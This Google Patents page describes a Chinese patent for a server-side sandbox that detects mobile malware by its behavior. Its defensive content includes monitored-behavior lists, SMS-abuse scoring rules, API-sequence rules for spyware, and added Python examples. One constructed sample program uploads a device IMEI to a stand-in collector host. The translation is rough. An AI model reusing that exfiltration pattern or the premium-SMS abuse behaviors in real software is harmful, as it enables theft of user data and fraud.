CN102082802A - Behavior-based mobile terminal security protection system and method - Google Patents


Info

Publication number
CN102082802A
Authority
CN
China
Prior art keywords
behavior
software program
software
server
terminal equipment
Prior art date
Legal status
Pending
Application number
CN2011100487216A
Other languages
Chinese (zh)
Inventor
陈彪
Current Assignee
Yangpuweiye Technology Limited
Original Assignee
陈彪
Priority date
Filing date
Publication date
Application filed by 陈彪
Priority to CN2011100487216A
Publication of CN102082802A

Abstract

The invention provides a program-behavior-based security protection system and method for mobile equipment. The system comprises terminal equipment and a server, wherein the server comprises a receiving module, a distribution module, a detection module and a report generation module. The receiving module receives a software program from the terminal equipment; the distribution module distributes the received software program to one of the simulators in a cloud made up of processors; the detection module detects and records the execution behavior of the software program (or other file) while it runs in a sandbox on the server; and the report generation module evaluates the harmlessness or hazard level of the software program (or other file) according to its execution behavior in the sandbox and returns an analysis report to the terminal equipment.

Description

Behavior-based security protection system and method for a mobile terminal
Technical field
The application relates to security technology for mobile terminal devices and, more specifically, to a program-behavior-based security protection system and method for a mobile terminal. The mobile terminal devices concerned include, but are not limited to, mobile communication devices (such as cell phones and smartphones) and portable entertainment devices (such as Apple's iPad, Samsung's GALAXY, Sony's PS series, and other tablet computers or audio-visual playback devices).
Background art
Two kinds of technology currently dominate the field of virus detection and removal. The first is firewall technology, a protective measure taken against unsafe factors on the Internet. A firewall is a barrier that shields an internal network from outside threats; its purpose is precisely to prevent unauthorized access by external network users. A firewall is made up of four parts (a service access policy, verification tools, packet filtering and an application gateway) and is a piece of software or hardware placed between a computer and the network it connects to. What a firewall monitors is ports and protocols; whether traffic is allowed through must be configured by the user, which requires professional familiarity with the system, and the granularity of monitoring is too coarse to distinguish accurately between programs.
The second detection and removal method is based on a virus definition database. This method requires a large-scale malware monitoring system and enormous manpower and resources to define, build and maintain the definition database. Furthermore, such antivirus software can only extract a virus signature after a sample of the virus has been captured, so it cannot defend against new, unknown viruses, and the virus database must be updated and upgraded in real time to keep up. As the number of malware samples grows exponentially, this method increasingly fails to meet practical needs.
In the mobile communication field, for example for mobile phones, the present malware detection and removal methods are all borrowed from the computer field and share its problems. In addition, malware on mobile phones differs greatly in nature from malware on computers: the definition of malware on a phone is not the same as on a computer, and malware spreads less easily on a large scale on phones. The main purpose of mobile phone malware is criminal activity such as stealing personal information, stealing bank account numbers and tapping phone calls. Performing detection and removal directly on a mobile terminal such as a phone makes too high a demand on the processing power and storage of the terminal device, and with present technology the efficiency and accuracy of such detection are both low.
Summary of the invention
To overcome the above-mentioned defects of the prior art, the invention provides a program-behavior-based security protection system and method for a mobile device.
According to one aspect of the invention, a program-behavior-based security protection system for a mobile communication device is provided, comprising terminal equipment and a server, characterized in that the server comprises a receiving module, a distribution module, a detection module and a report generation module, wherein: the receiving module receives a software program or other file sent from the terminal equipment; the distribution module distributes the received software program or other file to one of the simulators in a "cloud" made up of processors; the detection module detects and records the execution behavior of the software program or other file as it runs in a sandbox on the server; and the report generation module evaluates the harmlessness or hazard level of the software program or other file according to the behavior it performed in the sandbox and provides an analysis report to the terminal equipment.
According to another aspect of the invention, a program-behavior-based security protection method for a mobile device is provided, comprising: step 1) the terminal equipment, after receiving a software program or a link from an application server, forwards it to the server, either automatically or manually according to the user's familiarity with and confidence in the file; step 2) the server receives the software program or other file sent from the terminal equipment and distributes it to one of the simulators in a "cloud" made up of processors; step 3) the server detects and records the execution behavior of the software program or other file as it runs in a sandbox; step 4) the server evaluates the harmlessness or hazard level of the software program or other file according to the behavior it performed in the sandbox and provides an analysis report to the terminal equipment.
The system and method of this application can judge in advance, according to program behavior, whether software on a mobile phone is malware and remove it, and can stop malware from being installed on the phone at all, thereby actively preventing harm to the user. This active defense plays the role of preventing the "fire" itself rather than merely walling it off, saves the cost of building and maintaining a virus definition database, improves the efficiency and accuracy of malware detection, and eliminates malware in its cradle.
Description of drawings
Fig. 1 is a structural diagram of the security protection system for a mobile device according to the invention;
Fig. 2 is a schematic diagram of the technical detection report produced by the system;
Fig. 3 is a schematic diagram of the analysis report generated by the system.
As shown in the figures, in order to present the structure or method of the embodiments clearly, specific viruses and application devices are marked in the drawings. These are for illustration only and are not intended to limit the invention to these specific programs and environments; a person of ordinary skill in the art may adjust and modify the environments according to concrete needs, and such adjustments and modifications remain within the scope of the appended claims.
Embodiment
The program-behavior-based security protection system and method provided by the invention are described in detail below with reference to the drawings and specific embodiments.
In the following description several different aspects of the invention are described; those skilled in the art, however, may implement the invention using only some of the structures or flows described, or all of them. Specific numbers, configurations and orders are set forth for explanation, but the invention can clearly be implemented without these specific details. In other cases, well-known features are not described in detail so as not to obscure the invention.
In general, as shown in Fig. 1, the program-behavior-based security protection system for a mobile device provided by the invention comprises terminal equipment 100 and a server 200. The server comprises a receiving module 201, which receives the program from the terminal equipment 100 or from the source server from which the terminal equipment intends to download it.
Terminal equipment 100 means a device that interacts with an operator's equipment or an application server via communication facilities. It is usually placed at a convenient location from which it can connect to the server over those facilities, and consists mainly of a communication interface controller together with dedicated or selected input/output units; a mobile terminal device is not tied to one place and is therefore more flexible. The terminal equipment of the invention includes, but is not limited to, mobile communication devices (cell phones, smartphones) and portable entertainment devices (Apple's iPad, Samsung's GALAXY, Sony's PS series) and the like.
The terminal equipment 100 of this application has a receiving port and a transmitting port: the receiving port receives a software program from an application server, and the transmitting port sends the received software program to the server 200. The application server here includes, but is not limited to: application servers that provide software downloads, carrier servers, conversation servers that hold sessions with the terminal equipment, application servers that provide remote support to the terminal equipment, and other types of static and dynamic servers.
In general, as shown in Fig. 1, the server 200 of this application comprises a receiving module 201, a distribution module 202, a detection module 203, a comparison module 204 and a report generation module 205. The receiving module 201 receives the software program or other file sent from the terminal equipment 100; the distribution module 202 distributes the received software program or other file to one of the simulators in a "cloud" made up of processors; the detection module 203 detects the behavior of the software program or other file as it runs in a sandbox on the server 200; the comparison module 204 compares the behavior observed during execution of the software program or other file with a behavior library in the server 200 to establish whether it is already-known behavior, and can also directly compare the received software program or other software statically against the software recorded in the behavior library; and the report generation module 205 evaluates the harmlessness or hazard level of the software program or other file according to the behavior performed in the sandbox and provides an analysis report to the terminal equipment 100.
The structure and concrete operation of the security protection system are described further with reference to Fig. 1. After the terminal equipment 100 actively or passively receives an installation file or executable file from one of the application servers above, it can automatically send the received file to the server 200 of this application, or the user can send it manually, depending on the user's familiarity with and confidence in the file. For a phone user running the Android operating system, when an .apk file, an executable .exe file or any other file is received, the file is sent to the server 200 automatically or manually, and until the analysis report is received back from the server 200 the file is not run and any attempt by the file to run itself is refused.
The receiving module 201 receives the software program or other file sent from the terminal equipment 100. It collects the information sent by the terminal equipment 100 using a polling or listening mechanism, associates the received file or program with that terminal equipment 100, and obtains the device information of the terminal equipment 100.
The distribution module 202 distributes the received software program or other file to one of the simulators in the "cloud" made up of processors. The server 200 of this application is multi-tasking and multi-user; its software simulation execution environment comprises a cloud of multiple processors, and received software programs are distributed according to how idle the processors in the cloud are. Such a simulation execution environment comprises virtual machines, simulators and sandboxes: the virtual machine emulates the terminal equipment, the simulator simulates running the received software or executable file, and the sandbox is used to learn the execution process and result of the executable file.
The detection module 203 detects the behavior of the software program or other file as it runs in the sandbox on the server 200. The suspected malware is executed virtually on the server 200: the software is installed in the virtual execution environment, a sandbox is generated for that environment, and the behavior and trace information of the software are obtained. Specifically, the software is run on the virtual machine and each of its operating steps is executed one at a time; during each step the output data of the sandbox and the memory locations the software expects to access are monitored, and control points are set at sensitive locations and sensitive files. When the software's execution is expected to access one of these locations or read one of these files, the control point triggers automatically, reports the behavior to the detection module 203, and sends the read operation and memory location to the report generation module 205.
For example, for a commonly used mobile phone the monitored behaviors include: sending SMS and MMS messages, accessing the contacts on the phone or the SIM card, creating network connections (GPRS, EDGE, 3G and so on), accessing Bluetooth, accessing infrared, accessing the wireless LAN, accessing the GPS receiver, accessing the motion sensor, accessing the camera, accessing the microphone, and accessing other sensitive data.
In addition, the hazard level of a concrete action can be defined according to the behavior performed during and after installation of the software. Taking the sending of SMS messages as an example, the following actions can be regarded as potentially hazardous: sending SMS messages covertly in the background, sending SMS messages to people outside the contact list, sending SMS messages to the numbers of value-added (premium-rate) service providers, sending SMS messages to every contact in the contact list, sending SMS messages at a very high frequency, and sending SMS messages between 11 p.m. and 6 a.m.
The monitoring activities performed for mobile phone terminal equipment are listed below; these behaviors are classified as key monitored behaviors and dangerous behaviors:
1) Query the contact list
2) Insert a contact
3) Delete a contact
4) Update a contact
5) Send DataSMS to XXXXXXX (sends a data SMS to XXXXXX)
6) Send SMS to XXXXXXX Context:MMMMMM (sends an SMS to XXXXX with content MMMMMM)
7) Query the IMSI number
8) Query the phone number
9) Query the IMEI number
10) Query the SIM number
11) Http connect
12) Define URL:XXXXXXXX (defines the URL link address XXXXXX)
13) Define URI:XXXXXXXX (defines the URI link address XXXXXX)
14) (XXXX beginning with a file path is a system file address; XXXX beginning with http is a network address. A program that defines a file address at start-up can access files, and one that defines an http address can access the network.)
15) URL connect
16) Http Client accesses the network
17) Open Bluetooth
18) Open Camera Preview (opens the camera preview)
The report generation module 205 evaluates the harmlessness or hazard level of the software program or other file according to the behavior performed in the sandbox and provides an analysis report to the terminal equipment. The execution behavior and trace information learned by the detection module above are analyzed, and these behaviors and this information are rated according to an objective hazard level; the software is then judged to be malware or not according to the resulting score. In particular, a Bayesian decision system can be used to analyze the behaviors and action sequences, give a security rating for the behavior, and judge whether the software is malware.
An effective protection scheme can also be provided according to the hazard level. Prevention of harmful behavior can be implemented in two ways: a policy-based system and an expert system. In a policy-based system the administrator defines which behaviors are forbidden and which are allowed; taking SMS as an example, rules such as the following can be defined: is sending SMS to value-added service providers allowed? Is sending SMS in the background allowed? And so on. In an expert system, expertise and domain knowledge are used to judge malicious behavior, and each behavior is given a score (0 to 9, a larger number meaning greater danger). Taking SMS as an example, the following rules and scores are given: sending SMS at high frequency, e.g. 10 per minute: score 3; sending SMS to the number of a value-added service provider, e.g. 10086 or 1066907703: score 6; sending SMS to strangers at a very high frequency: score 7; sending SMS to the number of a value-added service provider at a very high frequency: score 7; sending SMS at high frequency to the number of a value-added service provider between 11 p.m. and 6 a.m.: score 9.
For the order in which APIs are called, rules such as the following can be defined: if the APIs called have modified the registry, accessed the user's personal information and then established a network connection, the software can be regarded as spyware that steals personal information. For access to the phone's hardware, the following order is defined: accessing the GPS function, accessing the motion sensor and then establishing a network connection; if this order is matched, the software can be regarded as location-tracking spyware.
Fig. 2 illustrates the analysis report for an application sent from one mobile phone terminal. After the phone user visits a network link, the link automatically sends a file or a further link to the terminal equipment; the terminal equipment sends the link to the server 200 of this application, or downloads the file and then sends it to the server 200, and the server 200 runs the file step by step locally to obtain information about it. In the figure, the right side shows the running process, displaying a power consumption parameter and the access situation, and provides an execute button; the left side shows, for each executed step of the file, the links accessed and the information transmitted. For larger generated files, these files can be logically integrated to generate the technical report.
Fig. 3 illustrates the security report produced. The behavioral features in the technical report of Fig. 2 are analyzed, the file is given a security rating according to the objective comparison criteria and hazard levels described above, and the report is returned to the user of the terminal equipment. As shown in Fig. 3, for the file executed in Fig. 2, the analysis of its technical report yields the degree of danger to which this software belongs.
The comparison module 204 compares the behavior observed during execution of the detected software program or other file with the behavior library in the server to establish whether it is already-known behavior. The comparison module 204 can also directly compare the received software program, or other software, statically against the software recorded in the behavior library.
After the report generation module has produced a comprehensive analysis report for a file, the file can be saved; when a new file arrives later, its file attributes can be compared statically with the saved files before any dynamic detection of the file's run-time actions, in order to improve operational efficiency.
In another embodiment of this application, a program-behavior-based security protection method for a mobile device is provided. The environment in which the method runs comprises terminal equipment 100 and a server 200; the server comprises a receiving module 201, which receives the program from the terminal equipment or from the source server from which the terminal equipment intends to download it.
The terminal equipment is as described above for the system embodiment: a device that interacts with an operator's equipment or an application server via communication facilities, consisting mainly of a communication interface controller together with dedicated or selected input/output units, not tied to one place and therefore more flexible; it includes, but is not limited to, mobile communication devices (cell phones, smartphones) and portable entertainment devices (Apple's iPad, Samsung's GALAXY, Sony's PS series) and the like.
The terminal equipment 100 has a receiving port and a transmitting port: the receiving port receives a software program from an application server, and the transmitting port sends the received software program to the server 200. The application server here includes, but is not limited to: application servers that provide software downloads, carrier servers, conversation servers that hold sessions with the terminal equipment, application servers that provide remote support to the terminal equipment, and other types of static and dynamic servers.
In general, the method of this application comprises: step 10) receiving a software program or other file sent from the terminal equipment; step 20) distributing the received software program or other file to one of the simulators in a "cloud" made up of processors; step 30) detecting the behavior of the software program or other file as it runs in the sandbox on the server; step 40) evaluating the harmlessness or hazard level of the software program or other file according to the behavior performed in the sandbox and providing an analysis report to the terminal equipment. The method further comprises comparing the behavior observed during execution of the detected software program or other file with the behavior library in the server to establish whether it is already-known behavior, or directly comparing the received software program or other software statically against the software in the behavior library.
The concrete operation of the security protection method is described further with reference to Fig. 1. After the terminal equipment 100 actively or passively receives an installation file or executable file from one of the application servers above, it can automatically send the received file to the server 200 of this application, or the user can send it manually, depending on the user's familiarity with and confidence in the file. For a phone user running the Android operating system, when an .apk installation file, an executable file or any other file is received, the file is sent to the server automatically or manually, and until the analysis report is received back from the server the file is not run and any attempt by the file to run itself is refused.
In step 10), a polling or listening mechanism is used to collect the information sent by the terminal equipment; the received file or program is associated with that terminal equipment 100, and the device information of the terminal equipment 100 is obtained.
In step 20), the received software program or other file is distributed to one of the simulators in the "cloud" made up of processors. The server of this application is multi-tasking and multi-user; its software simulation execution environment comprises a cloud of multiple processors, and the received software program is distributed according to how idle the processors in the cloud are. Such a simulation execution environment comprises virtual machines, simulators and sandboxes: the virtual machine emulates the terminal equipment, the simulator simulates running the received software or executable file, and the sandbox is used to learn the execution process and result of the executable file.
In step 30), the behavior of the software program or other file running in the sandbox on the server is detected. The suspected malware is executed virtually on the server: the software is installed in the virtual execution environment, a sandbox is generated for that environment, and the behavior and trace information of the software are obtained. Specifically, the software is run on the virtual machine and each of its operating steps is executed one at a time; during each step the output data of the sandbox and the memory locations the software expects to access are monitored, and control points are set at sensitive locations and sensitive files. When the software's execution is expected to access one of these locations or read one of these files, the control point triggers automatically, reports the behavior to the detection module, and sends the read operation and memory location to the report generation module.
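The control-point mechanism of the detection module 203 and of step 30) above can be illustrated with a small simulated sandbox. The following is an added example written for this page, not code from the patent or its assignee: the class and function names (`Sandbox`, `Event`, `run_in_sandbox`, `summarize`) are assumptions, the contact list, IMEI and the sample program are constructed, and only a subset of the monitored operations listed in the description is modelled. Each sensitive operation records an event on a virtual clock and reports it to a hook standing in for the detection module before the operation proceeds.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Event:
    """One triggered control point: which monitored operation fired, on what
    target, and when on the sandbox's virtual clock (seconds since the run began)."""
    api: str
    target: str
    t: float


class Sandbox:
    """Simulated terminal equipment. Every sensitive operation is wrapped by a
    control point that records an Event and reports it to the detection module
    (the hook) before the simulated operation proceeds. All data is constructed."""

    def __init__(self, hook: Optional[Callable[[Event], None]] = None):
        self.hook = hook
        self.trace: List[Event] = []
        self.clock = 0.0
        # Constructed contact list and device identifier; not real numbers.
        self.contacts = ["13800000001", "13800000002"]
        self.imei = "000000000000000"

    def _control_point(self, api: str, target: str) -> None:
        ev = Event(api, target, self.clock)
        self.trace.append(ev)
        if self.hook is not None:
            self.hook(ev)              # report the behavior to the detection module

    def tick(self, seconds: float) -> None:
        self.clock += seconds          # advance the virtual clock between steps

    # Monitored operations (a subset of the list given in the description).
    def query_contacts(self) -> List[str]:
        self._control_point("query_contacts", "contacts")
        return list(self.contacts)

    def query_imei(self) -> str:
        self._control_point("query_imei", "IMEI")
        return self.imei

    def send_sms(self, number: str, text: str) -> None:
        self._control_point("send_sms", number)

    def http_connect(self, url: str) -> None:
        self._control_point("http_connect", url)

    def open_camera_preview(self) -> None:
        self._control_point("open_camera_preview", "camera")


def run_in_sandbox(program: Callable[[Sandbox], None]) -> List[Event]:
    """Run a program step by step inside a fresh sandbox and return its trace."""
    reported: List[Event] = []
    box = Sandbox(hook=reported.append)
    program(box)
    assert reported == box.trace       # every control point reached the hook
    return box.trace


def summarize(trace: List[Event]) -> Dict[str, int]:
    """Count how many times each monitored operation fired (input to the report)."""
    counts: Dict[str, int] = {}
    for ev in trace:
        counts[ev.api] = counts.get(ev.api, 0) + 1
    return counts


def constructed_sample_program(dev: Sandbox) -> None:
    """Constructed stand-in for a submitted .apk: reads the IMEI and contacts,
    messages every contact, then uploads the IMEI. Not a real sample."""
    imei = dev.query_imei()
    for number in dev.query_contacts():
        dev.send_sms(number, "hello")
        dev.tick(1.0)
    dev.http_connect("http://collector.example.invalid/upload?imei=" + imei)


if __name__ == "__main__":
    trace = run_in_sandbox(constructed_sample_program)
    for ev in trace:
        print(f"t={ev.t:5.1f}s  {ev.api:<20} {ev.target}")
    print(summarize(trace))
```

The trace, not the program's own output, is what the report generation module consumes; in a real sandbox the hooks would sit at the platform API boundary (contacts provider, telephony, sockets) rather than in a Python class, but the shape of the record, operation plus target plus time, is what the later scoring rules need.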
For example, for a commonly used mobile phone the monitored behaviors include: sending SMS and MMS messages, accessing the contacts on the phone or the SIM card, creating network connections (GPRS, EDGE, 3G and so on), accessing Bluetooth, accessing infrared, accessing the wireless LAN, accessing the GPS receiver, accessing the motion sensor, accessing the camera, accessing the microphone, or accessing other sensitive data.
In addition, the hazard level of a concrete action can be defined according to the behavior performed. Taking the sending of SMS messages as an example, the following actions can be regarded as potentially hazardous: sending SMS messages covertly in the background, sending SMS messages to people outside the contact list, sending SMS messages to the numbers of value-added (premium-rate) service providers, sending SMS messages to every contact in the contact list, sending SMS messages at a very high frequency, and sending SMS messages between 11 p.m. and 6 a.m.
Step 40) in, according to the behavior that software program or alternative document are carried out in the hourglass model, the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.Wherein, by analyzing act of execution and the trace information that above-mentioned detection module is known, these behaviors and information are evaluated according to the objective extent of injury; According to the evaluation score, judge whether this software is Malware.Particularly, can utilize the Bayesian decision system, analysis behavior and action sequence provide the safety grading of this behavior, judge whether this software is Malware.
Further, can provide effective protectiving scheme, to the prevention of harmful act two kinds of implementations can be arranged, based on the system and the expert system of strategy according to its extent of injury.For the system based on strategy, which behavior the keeper can define is forbidden, and which behavior is allowed to.With the short message is example, the rule that can be defined as follows: whether allow to send note to value added service provider, whether allow to send note on the backstage, perhaps other.For expert system, can use expertise and domain knowledge to judge malicious act, and each behavior provided certain mark (0-9, number is big more represents that more danger is big more), with the note is that example provides following rule and mark: high-frequency ground sent note, as 1 minute 10------mark: 3; Send the number of note, as------marks: 6 such as 10086,1066907703 to value added service provider; Send note to unacquainted people, and frequency is very high------mark: 7; Send the number of note to value added service provider, and frequency is very high------mark: 7; 11 send note number------marks: 9 to value added service provider to high-frequency ground between the 6:00 AM at night.
Rules can also be defined over the order in which APIs are called. For example, if the APIs called modify the registry, access the user's personal information, and then establish a network connection, the program can be regarded as spyware that steals personal information. For access to the phone's hardware, the following order can be defined: accessing the GPS function, accessing the motion sensor, and establishing a network connection; a program that satisfies this order can be regarded as location-tracking spyware.
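The SMS scoring rules, the administrator policy and the ordered API-call rules of the two preceding paragraphs can be expressed as data and run over a recorded behavior trace. The following is an added example (not the patent's code) that does so. The event field names, the 10-per-minute threshold, the 23:00 to 06:00 night window, the address book, the abstract API names and the choice that the highest matching score wins are assumptions for the illustration; the trace at the bottom is constructed.

```python
"""Expert-system scores, policy checks and API-order rules over a behavior trace.

Added example, not the patent's code. Event fields, thresholds, the address
book, the abstract API names and 'highest matching score wins' are assumptions.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Sequence, Set, Tuple

PREMIUM_NUMBERS = {"10086", "1066907703"}        # value-added service numbers named in the text
CONTACTS = {"+8613800000001", "+8613800000002"}  # constructed address book
NIGHT_START, NIGHT_END = 23, 6                   # 23:00 .. 06:00

# (description, facts that must all hold, score 0-9): the SMS rules from the text.
EXPERT_RULES: List[Tuple[str, Set[str], int]] = [
    ("high-frequency SMS", {"high_frequency"}, 3),
    ("SMS to value-added service number", {"to_premium"}, 6),
    ("high-frequency SMS to strangers", {"to_unknown", "high_frequency"}, 7),
    ("high-frequency SMS to value-added service number", {"to_premium", "high_frequency"}, 7),
    ("high-frequency SMS to value-added service number at night",
     {"to_premium", "high_frequency", "night"}, 9),
]

# Policy-based system: the administrator marks SMS behaviors as allowed (True) or forbidden.
POLICY: Dict[str, bool] = {"to_premium": False, "background": False}

# Ordered API-call patterns from the text (assumed abstract names for the real APIs).
SEQUENCE_RULES: List[Tuple[str, Sequence[str]]] = [
    ("information-stealing spyware", ("registry_modify", "personal_info_access", "network_connect")),
    ("location spyware", ("gps_access", "motion_sensor_access", "network_connect")),
]


def sms_facts(events: List[dict], per_minute: int = 10) -> Dict[str, bool]:
    """Reduce raw SMS events to the boolean facts the rules are written against."""
    facts = {k: False for k in ("high_frequency", "to_premium", "to_unknown", "night", "background")}
    sms = [e for e in events if e["type"] == "sms"]
    times = sorted(e["time"] for e in sms)
    for i, start in enumerate(times):  # any 60-second window holding per_minute messages
        if sum(1 for t in times[i:] if t - start < timedelta(minutes=1)) >= per_minute:
            facts["high_frequency"] = True
            break
    for e in sms:
        if e["to"] in PREMIUM_NUMBERS:
            facts["to_premium"] = True
        elif e["to"] not in CONTACTS:
            facts["to_unknown"] = True
        facts["background"] |= bool(e.get("background"))
        facts["night"] |= e["time"].hour >= NIGHT_START or e["time"].hour < NIGHT_END
    return facts


def expert_score(facts: Dict[str, bool]) -> Tuple[int, List[str]]:
    """Highest score among the rules whose facts all hold, plus the names of the rules that fired."""
    fired = [(score, name) for name, needed, score in EXPERT_RULES if all(facts[f] for f in needed)]
    return (max(s for s, _ in fired) if fired else 0), [n for _, n in sorted(fired)]


def policy_violations(facts: Dict[str, bool], policy: Dict[str, bool] = POLICY) -> List[str]:
    """Observed behaviors that the administrator's policy forbids."""
    return [b for b, allowed in policy.items() if facts.get(b) and not allowed]


def in_order(calls: Sequence[str], pattern: Sequence[str]) -> bool:
    """True if every element of pattern occurs in calls in that relative order (gaps allowed)."""
    it = iter(calls)
    return all(any(c == p for c in it) for p in pattern)


def sequence_verdicts(events: List[dict]) -> List[str]:
    calls = [e["name"] for e in events if e["type"] == "api"]
    return [label for label, pattern in SEQUENCE_RULES if in_order(calls, pattern)]


def analyze(events: List[dict]) -> dict:
    facts = sms_facts(events)
    score, rules = expert_score(facts)
    return {"facts": facts, "score": score, "rules": rules,
            "policy_violations": policy_violations(facts),
            "spyware": sequence_verdicts(events)}


# Constructed trace: ten background SMS to 10086 within 30 seconds at 23:30,
# then GPS and motion-sensor reads followed by a network connection.
_T0 = datetime(2011, 3, 1, 23, 30)
SAMPLE_TRACE: List[dict] = [
    {"type": "sms", "to": "10086", "background": True, "time": _T0 + timedelta(seconds=3 * i)}
    for i in range(10)
] + [{"type": "api", "name": n} for n in
     ("gps_access", "file_read", "motion_sensor_access", "network_connect")]

if __name__ == "__main__":
    print(analyze(SAMPLE_TRACE))
```

On the constructed trace the expert system scores 9 (the night-time premium-number rule fires, and the lower-scoring rules it subsumes fire as well), the policy reports two forbidden behaviors, and the API-order rule for location spyware matches even though an unrelated call sits between the sensor reads and the connection. The subsequence match is deliberately loose; a stricter rule would also bound the time between the calls, which the trace format here could carry but the text does not specify.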
In addition, in step 50), after the comprehensive analysis report for a file has been produced, the file can be retained. When a new file arrives later, its file attributes can first be compared statically with the retained files before its execution behavior is detected, which improves operating efficiency.
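The static comparison of step 50) amounts to a report cache in front of the dynamic analysis. The following is an added example (not the patent's code) of that cache, together with the check a practitioner would want: an identical file re-submitted under another name is served from the retained report, while a one-byte variant misses the exact comparison and has to be run again. The attributes used as the key (SHA-256 digest and size), the report structure and the sample bodies are assumptions; the samples are constructed.

```python
"""Static attribute comparison against retained reports before dynamic analysis.

Added example, not the patent's code. The cache key (SHA-256 digest and size),
the report structure and the sample bodies are assumptions; samples are constructed.
"""
import hashlib
from typing import Callable, Dict, Tuple

Report = Dict[str, object]


def file_attributes(content: bytes) -> Tuple[str, int]:
    """Attributes compared statically: content digest and size (the file name is deliberately excluded)."""
    return hashlib.sha256(content).hexdigest(), len(content)


class ReportCache:
    """Retains the comprehensive report for each analyzed file, keyed by its static attributes."""

    def __init__(self) -> None:
        self._reports: Dict[Tuple[str, int], Report] = {}
        self.dynamic_runs = 0  # how many files actually went through the monitored run

    def analyze(self, content: bytes, dynamic_analysis: Callable[[bytes], Report]) -> Tuple[Report, bool]:
        """Return (report, cache_hit). Only a file not seen before is executed dynamically."""
        key = file_attributes(content)
        cached = self._reports.get(key)
        if cached is not None:
            return cached, True
        self.dynamic_runs += 1
        report = dynamic_analysis(content)
        self._reports[key] = report
        return report, False


def toy_dynamic_analysis(content: bytes) -> Report:
    """Stand-in for the monitored run: scores a constructed body that targets a premium number."""
    score = 6 if b"10086" in content else 0
    return {"score": score, "verdict": "malware" if score >= 5 else "benign"}


# Constructed samples: the same body submitted twice (e.g. re-uploaded under a new
# name) and a one-byte variant that defeats the exact comparison.
SAMPLE_A = b"APP\x00send_sms(10086)"
SAMPLE_A_RENAMED = SAMPLE_A
SAMPLE_A_VARIANT = SAMPLE_A + b"\x00"


def demo() -> Dict[str, int]:
    """Run the three samples through one cache and report how many needed a dynamic run."""
    cache = ReportCache()
    hits = 0
    for body in (SAMPLE_A, SAMPLE_A_RENAMED, SAMPLE_A_VARIANT):
        _, hit = cache.analyze(body, toy_dynamic_analysis)
        hits += hit
    return {"dynamic_runs": cache.dynamic_runs, "cache_hits": hits}


if __name__ == "__main__":
    print(demo())
```

The three submissions cost two dynamic runs and one cache hit. The miss on the variant is the limitation of comparing exact attributes: trivial repacking or padding produces a new digest, so in practice the static comparison is complemented by comparing the behavior itself against the behavior library (claims 2 and 11) or by similarity hashing, neither of which this example implements.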
Finally, it should be noted that the above embodiments only describe the technical solution of the present invention and do not limit it; the present invention can be extended to other modifications, variations, applications and embodiments, all of which are considered to fall within the spirit and teachings of the present invention.

Claims (15)

1. A security protection system for a terminal device based on program behavior, comprising a terminal device and a server, characterized in that the server comprises a receiving module, a distribution module, a detection module and a report generation module, wherein the receiving module receives software programs or other executable files sent from the terminal device; the distribution module distributes the received software program or other file to one of the simulators in a "cloud" made up of processors; the detection module detects and records the execution behavior of the software program or other file running in the server's hourglass model; and the report generation module evaluates the extent of harm of the software program or other file according to the behavior it performed in the hourglass model and provides an analysis report to the terminal device.
2. The system of claim 1, characterized in that it further comprises a comparison module, which compares the detected behavior of the software program or other file during execution with a behavior library in the server to learn whether the behavior is already known; or directly compares the received software program or other software statically with the software in the behavior library.
3. The system of claim 1, characterized in that the detection module installs the software program in a virtual execution environment, generates the hourglass of the virtual execution environment, and obtains the behavior and trace information of the installation and execution of the software.
4. The system of claim 3, characterized in that the detection module runs the software program on a virtual machine, executes each operating step of the software step by step, sets control points at the memory locations that the hourglass monitors for output data and expected accesses, and collects the behaviors that trigger the control points.
5. The system of claim 1, characterized in that the software simulation execution environment of the system comprises a cloud made up of a plurality of processors, and the distribution module distributes the received software program according to the idleness of the processors in the cloud; the simulation execution environment comprises a virtual machine for simulating the terminal device, a simulator for simulating the operation of the received software program or executable file, and the hourglass for monitoring the execution behavior of the software file.
6. The system of claim 1, characterized in that the receiving module uses a polling mechanism or a listening mechanism to collect the information sent from the terminal device, associates the received file or software program with that terminal device, and obtains the device information of the terminal.
7. The system of claim 6, characterized in that the terminal device has a receiving port and a transmitting port, the receiving port receives software programs from various application servers, and the transmitting port sends the received software program to the server; wherein the terminal device either sends the received file to the server automatically, or the user sends the received file to the server manually according to his own familiarity with and confidence in the file.
8. The system of claim 1, characterized in that the report generation module evaluates the installation behavior, execution behavior and trace information obtained by the detection module according to an objective extent of harm, and judges from the evaluation score whether the software is malware; or uses a Bayesian decision system to analyze the behaviors and action sequences, produce a safety grade for them, and judge whether the software is malware.
9. The system of claim 8, characterized in that the report generation module provides a policy-based system or an expert system according to the extent of harm of the software program; wherein in the policy-based system the administrator defines which behaviors are forbidden and which are allowed, and in the expert system, expert and domain knowledge is used to judge malicious behavior and each behavior is given a certain score.
10. A security protection method for a terminal device based on program behavior, comprising:
Step 1), after the terminal device receives a software program or a link from an application server, it forwards it to the server; wherein the terminal device either forwards it automatically or the user forwards it manually according to his familiarity with and confidence in the file;
Step 2), the server receives the software program or other file sent from the terminal device and distributes it to one of the simulators in a "cloud" made up of processors;
Step 3), the server detects and records the installation behavior, execution behavior or trace information of the software program or other file running in the hourglass model;
Step 4), the server evaluates the friendliness or extent of harm of the software program or other file according to the behavior it performed during installation or execution in the hourglass model, and provides an analysis report to the terminal device.
11. The method of claim 10, further comprising: comparing the detected behavior of the software program or other file during execution with a behavior library in the server to learn whether the behavior is already known; or directly comparing the received software program or other software statically with the software in the behavior library.
12. The method of claim 10, wherein in step 3) the software program is installed in a virtual execution environment, the hourglass of the virtual execution environment is generated, and the installation behavior, execution behavior and trace information of the software are obtained; wherein the software is run on a virtual machine, each operating step of the software is executed step by step, control points are set at the memory locations that the hourglass monitors for output data and expected accesses, and the behaviors that trigger the control points are collected.
13. The method of claim 10, wherein in step 2) the software simulation execution environment comprises a cloud made up of a plurality of processors, and the server distributes the received software program according to the idleness of the processors in the cloud; the simulation execution environment comprises a virtual machine for simulating the terminal device, a simulator for simulating the operation of the received software or executable file, and the hourglass for monitoring the execution of the software file.
14. The method of claim 10, wherein in step 4) the server evaluates the obtained execution behavior and trace information according to an objective extent of harm and judges from the evaluation score whether the software is malware; or uses a Bayesian decision system to analyze the behaviors and action sequences, produce a safety grade for them, and judge whether the software is malware.
15. The method of claim 14, wherein in step 4) the server provides a policy-based system or an expert system according to the extent of harm of the behavior; wherein in the policy-based system the administrator defines which behaviors are forbidden and which are allowed, and in the expert system, expert and domain knowledge is used to judge malicious behavior and each behavior is given a certain score.

Priority Applications (1)

